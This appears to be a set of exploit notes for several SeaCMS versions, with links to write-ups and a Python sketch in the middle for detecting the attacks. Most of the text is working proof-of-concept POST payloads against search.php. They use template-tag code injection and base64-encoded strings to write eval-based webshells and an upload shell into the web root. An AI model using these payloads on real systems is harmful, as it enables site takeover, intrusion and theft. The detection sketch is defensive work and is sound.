seacms

seacms 6.45 vulnerability getshell

https://blog.csdn.net/qq_35078631/article/details/76595817
poc:

192.168.0.6/seacms/search.php

post:
searchtype=5&order=}{end if} {if:1)fputs(fopen(base64_decode(eWVzaTEucGhw),w),base64_decode(base64_decode(UEhOamNtbHdkQ0JzWVc1bmRXRm5aVDBpY0dod0lqNUFaWFpoYkNna1gxQlBVMVJiZVdWemFURmRLVHd2YzJOeWFYQjBQZz09)));if(1}{end if}

This creates the file yesi1.php in the web root, with the following content:

<script language="php">@eval($_POST[yesi1])</script>

SeaCMS (海洋cms) v6.53 / v6.54 vulnerability reproduction

https://www.cnblogs.com/zhaijiahui/p/7648350.html
Chopper (code execution) functions and command execution functions explained, and getshell methods
https://www.cnblogs.com/fox-yu/p/9134848.html
poc:
Write an upload shell (the parameters are passed via POST; symbols such as 【<】【>】【+】【=】【/】 must not appear)

192.168.0.6/seacms/search.php

post:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));

Upload a one-line webshell

seacms 6.55 code injection vulnerability

https://github.com/SukaraLin/php_code_audit_project/blob/master/seacms/seacms%206.55%20%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

poc

http://192.168.0.6/upload/search.php?fputs(fopen(base64_decode(eWVzaTEucGhw),w),base64_decode(base64_decode(UEhOamNtbHdkQ0JzWVc1bmRXRm5aVDBpY0dod0lqNUFaWFpoYkNna1gxQlBVMVJiZVdWemFURmRLVHd2YzJOeWFYQjBQZz09)));

post:
searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*
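Detection sketch for the three search.php requests above, as an added example that is not part of the original notes or of seacms: every one of those POST bodies carries the CMS's own template tags ({if, {end if}, {searchpage:...}) inside a request parameter, so the check keys on that syntax rather than on PHP function names, which the 6.53 to 6.55 bodies split across several parameters. The function name, the regex and the sample requests are assumptions constructed for illustration; the samples carry no payload.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Template syntax seen in the PoC bodies on this page. A legitimate search
# term has no reason to contain the CMS's own template tags.
TEMPLATE_MARKERS = re.compile(
    r"\{\s*if\b|\{\s*end\s+if\s*\}|\{\s*searchpage\s*:", re.IGNORECASE
)


def suspicious_params(url, body):
    """Return the sorted names of POST parameters sent to search.php whose
    URL-decoded value contains template markers (hypothetical helper)."""
    if not urlsplit(url).path.lower().endswith("/search.php"):
        return []
    hits = set()
    # parse_qsl percent-decodes values, so encoded braces are caught too.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if TEMPLATE_MARKERS.search(value):
            hits.add(name)
    return sorted(hits)


# Constructed sample requests: (URL, POST body). PLACEHOLDER stands in for
# whatever code a real request would carry.
SAMPLES = [
    ("/seacms/search.php", "searchtype=5&searchword=batman&order=time"),
    ("/seacms/search.php",
     "searchtype=5&order=}{end if} {if:1)PLACEHOLDER(1}{end if}"),
    ("/seacms/search.php",
     "searchtype=5&searchword={if{searchpage:year}&year=:x{searchpage:area}}&area=y"),
    ("/upload/search.php?PLACEHOLDER",
     "searchtype=5&searchword=%7Bif%7Bsearchpage%3Ayear%7D&year=x"),
    ("/seacms/index.php", "q={if:1}"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, suspicious_params(url, body))
```

Run over a web server's request-body log (or as a WAF pre-filter), a non-empty result for search.php is a strong signal because ordinary search terms never contain these tags.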

seacms 6.6.1

seacms 6.6.1 admin backend getshell

https://github.com/SecWiki/CMS-Hunter/blob/master/seacms/seacms6.61/seacms.md

seacms 6.6.1 admin backend stored XSS

https://github.com/SecWiki/CMS-Hunter/blob/master/seacms/seacms6.61/seacms661.md
